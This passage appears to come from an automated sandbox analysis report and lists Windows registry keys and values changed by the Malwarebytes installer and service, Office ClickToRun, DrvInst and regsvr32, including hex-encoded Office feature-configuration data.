Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|12" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133557949509966320" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\ C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\22\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.13 = 4d6963726f736f66742e4f66666963652e566973696f2e484f50657266496d70726f76656d656e7473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e57686174734e65772e454353446174614c6f61646564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3130304b42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3130304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d31304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d314742416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d314d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3530304b42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3530304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d35304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d354d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d5265616c6c79426967416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e456e61626c655061747465726e73496e41746e74786e64222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e52616973655569614175746f436f72726563744576656e7457697468456e74697265576f7264222c20225622203a2022626f6f6c7c3122207d205d2c2022464347726f75704d617022203a207b2022464347726f75704d61705f3122203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657231222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373838333230323b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657232222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373838323936373b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657233222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373838333231313b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657234222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373934313932373b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657235222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383732353732343238343635343239363b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b6564477261706869637341646170746572436f756e74222c20225622203a2022696e7433325f747c3522207d205d2c2022464347726f75704d61705f3222203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e476c6f62616c5265736f75726365496e666f4361636865456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e53686f756c644d69677261746546726f6d4f72617069222c20225622203a2022626f6f6c7c3122207d205d2c2022464347726f75704d61705f3322203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e437a656368456e746572707269736547726f757032222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4f7074696f6e4f766572726964652e6373222c20225622203a20227374643a3a77737472696e677c4772616d6d617220616e6420726566696e656d656e74733a3a53657875616c206f7269656e746174696f6e20626961733d3022207d205d2c2022464347726f75704d61705f3422203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e42697a426172222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e766173426f6f742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e766173446f63756d656e7452656164792d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e766173466c6f6f64676174652d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734c6963656e73696e674469616c6f6752656e65772d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734c6f63616c4f70656e446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734c6f63616c53617665446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f444253617665446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f6e6544726976654f70656e446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f6e65447269766553617665446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f757453706163654f70656e2d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f757453706163655361766541732d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d466c6f6f6447617465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d496e41707050757263686173652d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f75745370616365222c20225622203a2022626f6f6c7c3022207d205d207d207d C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.4 = 65726d616e456e744469736162696c69747942696173222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4e6f7277656769616e426f6b6d61616c456e746572707269736547726f757031222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772617068496d706f72744865647769675558222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772617068496d706f7274496e73657274416c6c4f626a6563747356696577222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e47726170686963732e4368616e6765476174652e5570646174655461626c65426f756e6473466f72547970696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4967782e456e7375726545326f4d6f6e696b65724166746572456e7375726545326f222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4e6577456e737572655549444c6f676963222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4f6666696365496e7369646572526567697374726174696f6e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5043582e416c6c6f7746696e6450656f706c655573616765496e41744d656e74696f6e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5043582e4175746f436f6d706c6574652e46696e6450656f706c65537570706f7274222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5043582e4669784e6f6e526566436f756e7465644d736f506572736f6e6173222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e4261636b67726f756e64576f726b436f6e74726f6c6c6572427567466978222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e427567466978466f7250686f746f41637469766974794c6f6767696e6752656d6f76616c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e436f6e746163744361726456324f766572666c6f774d656e7573506861736532222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e46696e6450656f706c655573616765456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e497350656f706c655365617263684578656375746f72456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e506378417072696c323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e5063784665627275617279323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e5063784a616e75617279323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e5063784a756e65323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e5063784d61726368323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e557365506378436f6e74616374496e666f4c697374222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e506378417072696c323031374275676669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e506378436f6d6d6f6e436f6d70617265427567466978222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e506378436f6e746163744361726444706941776172656e6573734275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e506378436f6e7461637443617264466f6e74486569676874444450494275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063784a756e65323031374275676669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063784d61726368323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063784f63746f626572323031364275676669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e50656f706c655365617263682e436f6e7461637453656172636849676e6f72657353796d626f6c73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e50656f706c655365617263682e50637848616e646c65734175746f446973636f766572222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e50656f706c655365617263682e526563697069656e744175746f436f6d706c657465537570706f7274222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e50726f6f66696e672e4175746f4d616e616765722e41637469766974696573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e536d6172744c696e6b732e416c6c6f775265636f676e697a65536d6172744c696e6b73496e7369646550617261677261706873222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e54686573617572757350616e652e41637469766974696573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5472616e736c61746f722e456e61626c65466c6f6f6467617465537572766579222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5472616e736c61746f722e466c6f6f646761746553757276657944656c6179222c20225622203a2022696e7433325f747c3530303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e576f72642e46574153686f756c64426c6f636b53656c4368616e67656446616c73654576656e7473222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e576f72642e53656e6445646974466c6167546f4e6f4572726f724576656e7473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e576f72642e57726974696e67417373697374616e63654372697469717565466f724347415049222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e57726974696e67417373697374616e636555492e50616e652e46697857726f6e67436c6f73654c6f676963222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e436f6c6f72466f6e74537570706f7274456e61626c6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e46696c6556657273696f6e696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e48696464656e466f6e7473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e4f4172745465787456616c696461746552616e6765564544222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e52696368456469742e416c6c6f774475706c696361746555696d557064617465222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e52696368456469742e436f7079506173746548544d4c222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e5472616e7363726962652e436f6e666967436865636b44697361626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e417269614d617854656172646f776e55706c6f616454696d65496e536563222c20225622203a2022696e7433325f747c3222207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e566f6c756d65547261636b696e674d61784576656e7473222c20225622203a2022696e7433325f747c3530303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4169725370616365222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c224261636b656e645c22203a207b205c224576656e74735c22203a207b205c224c61796572486f7374496e697469616c697a6174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6d706f7369746f7253657373696f6e547970655c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2257696e33325c22203a207b205c225375624e616d657370616365735c22203a207b205c224c65676163795c22203a207b205c224576656e74735c22203a207b205c22416e696d6174696f6e50657263656e74556e64657233304650535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416e696d6174696f6e4176674650535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726f737357696e54496d654f6646697273744672616d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224176657261676550726573656e74735065725365636f6e645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4368617274696e67222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22436861727445326f4c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436861727445326f536176655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224368617274696e67456e644c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e436c69636b546f52756e222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c225363656e6172696f5c22203a207b205c224576656e74735c22203a207b205c22446f72695461736b5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225570646174655461736b557064617465646574656374696f6e325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174655461736b557064617465646f776e6c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174655461736b557064617465636c69656e74646f776e6c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265706169725461736b46756c6c7265706169725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265706169725461736b52656d6f7665696e7374616c6c6174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c5461736b436f6e6669677572656c696768745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c69656e747570646174655461736b436c69656e74646f776e6c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c5461736b53747265616d5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c5461736b437265617465776f726b696e67636f6e66696775726174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174655461736b55706461746566696e616c697a655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c225461736b4c61737452756e4865617274626561745c22203a207b205c224576656e74735c22203a207b205c225461736b4c61737452756e4865617274626561745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22556e6976657273616c426f6f7473747261707065725c22203a207b205c224576656e74735c22203a207b205c224170706c69636174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457865637574655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c656374506172616d65746572735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c656374456d6265646465645369676e61747572655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616c63756c617465506172616d65746572735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22436c69656e744361624d616e616765725c22203a207b205c224576656e74735c22203a207b205c225461736b557064617465436c69656e74446f776e6c6f6164446f457865637574655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225461736b436c69656e74446f776e6c6f6164446f457865637574655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253747265616d4361625c22203a207b205c224576656e74735c22203a207b205c22446f776e6c6f616453747265616d4361625c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c225472616e73706f72745c22203a207b205c225375624e616d657370616365735c22203a207b205c224578706572696d656e74616c5472616e73706f72745c22203a207b205c224576656e74735c22203a207b205c22436162735c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c224576656e74466c61675c22203a20323536207d207d207d2c205c225472616e73616374696f6e616c46696c654f7065726174696f6e735c22203a207b205c224576656e74735c22203a207b205c224170706c794368616e6765735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457865637574655472616e73616374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d2c205c224576656e74735c22203a207b205c2250726f636573734b696c6c657253687574646f776e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225472616e73706f72745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f776e6c6f61644361625c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e446961676e6f7374696373222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22436f6c6c6563746f725c22203a207b205c224576656e74735c22203a207b205c2253746172745472616365436f6c6c6563746f725c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e446f6373222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22536861726564436f6d6d656e74735f447261667443617264556e6d6f756e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2245 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Malwarebytes\FirstRun = "false" C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F128CCB-D86F-4998-803A-7CD58474FE2C}\ = "IScannerEvents" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{090D2E82-C71B-414E-AF6A-6681A92FF2B3}\TypeLib C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{ED06E075-D1FD-4635-BA17-2F6D6BB0DFD6} C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\ProgID\ = "COMCTL.ProgCtrl.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E8E-DF38-11CF-8E74-00A0C90F26F8} C:\Windows\SysWOW64\regsvr32.exe N/A
